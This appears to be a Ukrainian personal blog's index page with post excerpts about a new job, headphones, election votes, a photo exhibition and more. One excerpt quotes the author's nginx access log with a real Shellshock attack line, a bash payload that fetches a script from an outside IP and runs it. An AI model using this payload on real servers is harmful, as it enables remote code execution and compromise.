Категорія: Записки

У вере­сні я обі­цяв роз­ка­за­ти, які такі спра­ви я вирі­шу­вав під час від­пус­тки, а сьо­го­дні, наре­шті, можу пока­за­ти, де я пра­цюю, оскіль­ки вла­шту­вав­ся офі­цій­но. Зна­чить, адмі­ні­стра­тор систем вір­ту­а­лі­за­ції і систем збе­рі­га­н­ня даних, інно­ва­цій­ний від­діл.

Мітки:

Поста­ло зав­да­н­ня зна­йти більш-менш деше­ві і які­сні наву­шни­ки на робо­ту, бо я не хочу тяга­ти свої про­шні сені­ки туди-сюди. Нага­даю, рані­ше в мене були Піо­не­ри SE-M390 — над­чу­до­ва річ за свою ціну, я в них від­си­дів май­же всі сту­дент­ські роки і тро­хи біль­ше, але вре­шті вони …

Робо­чі наву­шни­ки Read More »

Мітки: ,

На цій весе­лій ноті давай­те при­га­да­є­мо, за кого я голо­су­вав на вибо­рах. 2007‑й рік. Мені 18, насту­пно­го дня пар­ла­мент­ські вибо­ри. Від­даю свій голос за БЮТ. 2008‑й рік. Вибо­ри мера Киє­ва. Голо­сую за Тур­чи­но­ва. 2010‑й рік. Пре­зи­дент­ські вибо­ри. В обох турах не під­три­мую …

Про вибо­ри Read More »

Мітки:

…на ніч.

Мітки: ,

У субо­ту мав честь від­ві­да­ти тра­ди­цій­ну щорі­чну вистав­ку репор­та­жної фото­гра­фії, яку орга­ні­зо­вує газе­та «День». Фото­гра­фії, як і зав­жди, на висо­ті, і, зві­сно, цьо­го­рі­чна пере­ва­жна тема­ти­ка оче­ви­дна, але дуже пора­ду­ва­ло те, що нею на вистав­ці не обме­жи­ли­ся. Зно­ву ж таки тра­ди­цій­но зали­шив від­гук …

Вистав­ка репор­та­жно­го фото Read More »

Мітки: ,

Пре­зи­дент звіль­нив п’ять голів рай­держ­адмі­ні­стра­цій. У Пол­тав­ській обла­сті з поса­ди голо­ви Ново­сан­жар­ської райа­дмі­ні­стра­ції звіль­не­ний Воло­ди­мир Пар­шев­люк… АХАХАХАХА, ой, тоб­то, мяу.

Мітки:

Ну, ви ж зна­є­те, як я до цьо­го став­лю­ся. Хто не знає, тому можу попу­ляр­но поясни­ти осо­би­сто. Але Укр­прав­да пише: Най­біль­ше пам'яток зали­ши­ло­ся в райо­нах: Гло­бин­сько­му — 11, Кре­мен­чу­цько­му та Семе­нів­сько­му — по 8, Мир­го­род­сько­му, Ново­сан­жар­сько­му, Хороль­сько­му — по 7. ОК, фіг із …

Про «лені­но­пад» Read More »

Мітки: ,

106 до н. э. — Гней Пом­пей Вели­кий (ум. 48 до н. э.), рим­ский вое­на­чаль­ник и нео­дно­кра­тный кон­сул респу­бли­ки. 1547 — Мигель де Сер­ван­тес Саа­ве­дра (ум. 1616), испан­ский писа­тель. 1571 — Мике­лан­дже­ло Кара­ва­джо (ум. 1610), ита­льян­ский живо­пи­сец, осно­во­по­ло­жник евро­пей­ской реа­ли­сти­че­ской живо­пи­си …

Іме­нин­ни­ки Read More »

Мітки:

Гре­пнув тут логи. root@sinclair /srv/http/nginx # zgrep '/bin/bash' */logs/nginx-access.log.*.gz natalenko.name/logs/nginx-access.log.4.gz:109.202.102.224 — - [25/Sep/2014:19:36:34 +0300] "GET /cgi-bin/hello HTTP/1.0" 404 641 "-" "() { :;}; /bin/bash ‑c \x22cd /tmp;wget http://213.5.67.223/jur;curl ‑O http://213.5.67.223/jur ; perl /tmp/jur;rm ‑rf /tmp/jur\x22"root@sinclair /srv/http/nginx # zgrep '/bin/bash' */logs/nginx-access.log.*.gz …

Shellshock Read More »

Мітки:

Роз­мо­ва з ака­де­мі­ком НАН Укра­ї­ни, пое­том Бори­сом Олій­ни­ком про куль­ту­ру Укра­ї­ни на зла­мі сто­літь, тися­чо­літь. У чоти­рьох части­нах.

Мітки: ,